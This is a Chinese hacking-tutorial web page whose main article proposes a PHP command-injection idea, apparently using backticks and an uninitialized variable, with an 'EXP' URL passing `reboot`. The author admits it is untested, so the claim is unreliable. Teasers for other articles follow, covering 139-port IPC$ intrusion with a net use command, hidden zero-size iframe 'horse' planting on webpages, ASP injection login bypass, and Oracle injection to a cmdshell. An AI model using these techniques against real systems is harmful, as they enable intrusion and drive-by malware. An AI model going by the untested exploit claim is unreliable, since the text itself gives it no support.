PHP漏洞挖掘的一点思路
所属分类:
网络安全 / 黑客教程
阅读数:
1260
收藏 0赞 0分享
<?php
$now1 = `date`;
echo "Now date is: $now1";
?>
/*
利用PHP的反引号` (不明白的自己查资料反引号"`"的作用)
如果 $sec 变量未赋初值,可能导致 shell_exec 执行系统指令
*/
<?php
echo "$sec"; // 同理这个也可能. echo $sec;
?>
EXP:
http://forum.eviloctal.com/exp.php?sec=`reboot`
这样只会把 $sec 当作变量来处理, 需要适当的变通一下。。。
今天翻书时无意间发现的,还没测试,有兴趣的朋友可以研究下。
PS:
变量在内存中初始化,一直保存在内存中。 未unset, 就可以读取!
汗颜:黑客居然这样保护自己的电脑
看了你昨天的留言,我才知道原来木马可以用这么多方式传播呀。那我想问你一件事,常在河边走,哪有不湿鞋,你经常黑别人,难道就没有被别人黑过吗?你是怎么防范其他黑客攻击的呢?
就像你说的那样,我也中过木马,也同样被黑过,我的经验
收藏 0赞 0分享
高手支招:通过进程抓马
对于进程这个概念,许多电脑用户都没有给予太多关注。在很多人印象里,只知道结束进程可以杀死程序,至于哪些进程对应哪些程序,究竟什么样的进程该杀,什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大家揭开进程的神秘面纱。
实例一:和进程的“表
收藏 0赞 0分享
ASP注入万能登陆密码
《黑客手册》样刊里面,oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码:
程序代码
<%
username=trim(Request.Form("username"))
password=trim(Reque
收藏 0赞 0分享
容易被黑客攻击的10个漏洞
应用程序级的安全漏洞通常不会像类似SirCam的邮件病毒或者诸如Code Red这样的蠕虫病毒那么容易广为扩散,但它们也同样会造成很多问题,从窃取产品或信息到使整个Web站点完全瘫痪。确保网站web应用程序的安全不是一件简单的事,而不幸的是对应用程序的攻击是非常容易的
收藏 0赞 0分享
139入侵简易教程
net use\192.168.0.1ipc$Content$nbsp;"" /user:administrator
提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。
首先,连接的命令
收藏 0赞 0分享
有史以来最牛的服务器反黑全集
Win2k的缺省安装很容易被攻击者取得帐号列表,即使安装了最新的Service ack也是如此。
方案一
1.打补丁
微软的作风就是三天一小补,五天一大补,漏洞太多,补一点就好一点,使用“开始-WindowsUpdate"然后把所有
收藏 0赞 0分享
网页挂马方法和技巧大汇总
1,挂马的N种方法
(1) HTML挂马法。
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>
收藏 0赞 0分享
黑客快速入门
今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息,
包括它的类型,用户列表,目录,端口,漏洞等等。
首先我们我们要找一台主机来练手,随便挑吧!www.dddd.com(乱说的)第一部,呵呵,
先在ie里看看吧,mmmm.....做的还行,挺精致的!主
收藏 0赞 0分享
秒杀Google浏览器
用Google浏览器浏览此篇文章,并点击下面的字符:
EVIL:%
是不是很爽,^_^。
收藏 0赞 0分享
犀利的 oracle 注入技术
犀利的 oracle 注入技术
原文发表在黑客手册
linx 2008.1.12
介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS
收藏 0赞 0分享
